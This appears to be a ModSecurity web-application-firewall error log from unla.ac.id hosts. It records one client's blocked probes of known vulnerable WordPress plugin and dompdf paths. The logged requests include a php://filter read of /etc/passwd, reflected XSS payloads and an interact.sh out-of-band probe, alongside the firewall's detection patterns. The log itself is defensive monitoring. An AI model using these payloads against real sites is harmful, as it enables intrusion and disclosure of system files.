[Tue Aug 29 11:53:17.874736 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoesNAAAAAV"]
[Tue Aug 29 11:53:18.565430 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAoW7OwAAAAJ"]
[Tue Aug 29 11:53:18.693479 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAoLfR4AAAAG"]
[Tue Aug 29 11:53:18.696110 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAojap4AAAAb"]
[Tue Aug 29 11:53:18.697429 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAoqbQwAAAAj"]
[Tue Aug 29 11:53:18.704186 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAolKVUAAAAe"]
[Tue Aug 29 11:53:18.716643 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAot8OQAAAAn"]
[Tue Aug 29 11:53:18.720180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAfWOWIAAAAL"]
[Tue Aug 29 11:53:18.734095 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAoLfR8AAAAG"]
[Tue Aug 29 11:53:18.916129 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAnTlb4AAAAA"]
[Tue Aug 29 11:53:18.943587 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vsCo-f0AAAoXJvsAAAAP"]
[Tue Aug 29 11:53:19.774520 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAoT7WUAAAAD"]
[Tue Aug 29 11:53:19.848713 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAolKVcAAAAe"]
[Tue Aug 29 11:53:19.849088 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAofm6YAAAAX"]
[Tue Aug 29 11:53:19.855620 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAfWOWQAAAAL"]
[Tue Aug 29 11:53:19.858201 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAoLfSEAAAAG"]
[Tue Aug 29 11:53:19.863302 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAni-DIAAAAU"]
[Tue Aug 29 11:53:19.927373 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAot8OcAAAAn"]
[Tue Aug 29 11:53:19.931191 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAowNnsAAAAH"]
[Tue Aug 29 11:53:19.940053 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAog@EIAAAAY"]
[Tue Aug 29 11:53:19.940823 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoesNQAAAAV"]
[Tue Aug 29 11:53:19.941366 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15v8Co-f0AAAolKVgAAAAe"]
[Tue Aug 29 11:53:19.950523 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAot8OgAAAAn"]
[Tue Aug 29 11:53:19.951704 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAowNnwAAAAH"]
[Tue Aug 29 11:53:19.975500 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoyGx0AAAAI"]
[Tue Aug 29 11:53:20.053417 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAowNn0AAAAH"]
